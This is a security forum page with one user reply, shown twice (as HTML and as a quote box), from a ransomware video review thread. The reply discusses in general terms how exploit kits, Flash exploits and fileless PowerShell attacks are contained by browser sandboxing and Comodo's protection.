Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Inactive Support Threads
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Security
Video Reviews - Security and Privacy
More Fun with Ransomware Part 5
Message
<blockquote data-quote="cruelsister" data-source="post: 514057" data-attributes="member: 7463"><p>Let me address the last point first- the Angler EK that you referenced above is to the point. The infection of systems is becoming quite common. Although Angler is still widely used (I believe that link was from 2014), things have branched out to other EK's like pseudo-darkleech, Hunter, and Neutrino. But all currently are doing pretty much the same thing, and that is the exploitation of Flash/Shockwave to deliver malware.</p><p></p><p>The initial malicious action, whether by swf or js files, would be contained in the sandbox if you have your browser sandboxed. To see this (safely) for yourself just keep the browser sandboxed and go to ether a java or flash or shockwave test site and try to run the test. Then check out what is in the sandbox as well as the blocked intrusions. This is a backhanded way of seeing how an exploit would be handled.</p><p></p><p>Secondly, these exploits invariably will connect to Command to do the actual downloading of a payload. If (when) the payload is autorun it would b treated as any other piece of malware by Comodo. I've done this a number of times with various Exploit Kits trying to run CryptXXX and still have not been able to trash the system. The worst scenario (still not seen n the Wild) would be a high quality signed payload. This I will deal with in Part 5 of the current (and currently sidetracked) RAT series.</p><p></p><p>Finally, Powershell is also used frequently in Fileless attacks. As noted in my post above this would be handled as a normal scriptor attack and would be brushed off. I've made numerous video on scriptors.</p><p></p><p>Hope this helped.</p><p></p><p>M</p></blockquote><p></p>
[QUOTE="cruelsister, post: 514057, member: 7463"] Let me address the last point first- the Angler EK that you referenced above is to the point. The infection of systems is becoming quite common. Although Angler is still widely used (I believe that link was from 2014), things have branched out to other EK's like pseudo-darkleech, Hunter, and Neutrino. But all currently are doing pretty much the same thing, and that is the exploitation of Flash/Shockwave to deliver malware. The initial malicious action, whether by swf or js files, would be contained in the sandbox if you have your browser sandboxed. To see this (safely) for yourself just keep the browser sandboxed and go to ether a java or flash or shockwave test site and try to run the test. Then check out what is in the sandbox as well as the blocked intrusions. This is a backhanded way of seeing how an exploit would be handled. Secondly, these exploits invariably will connect to Command to do the actual downloading of a payload. If (when) the payload is autorun it would b treated as any other piece of malware by Comodo. I've done this a number of times with various Exploit Kits trying to run CryptXXX and still have not been able to trash the system. The worst scenario (still not seen n the Wild) would be a high quality signed payload. This I will deal with in Part 5 of the current (and currently sidetracked) RAT series. Finally, Powershell is also used frequently in Fileless attacks. As noted in my post above this would be handled as a normal scriptor attack and would be brushed off. I've made numerous video on scriptors. Hope this helped. M [/QUOTE]
Insert quotes…
Verification
Post reply
Top
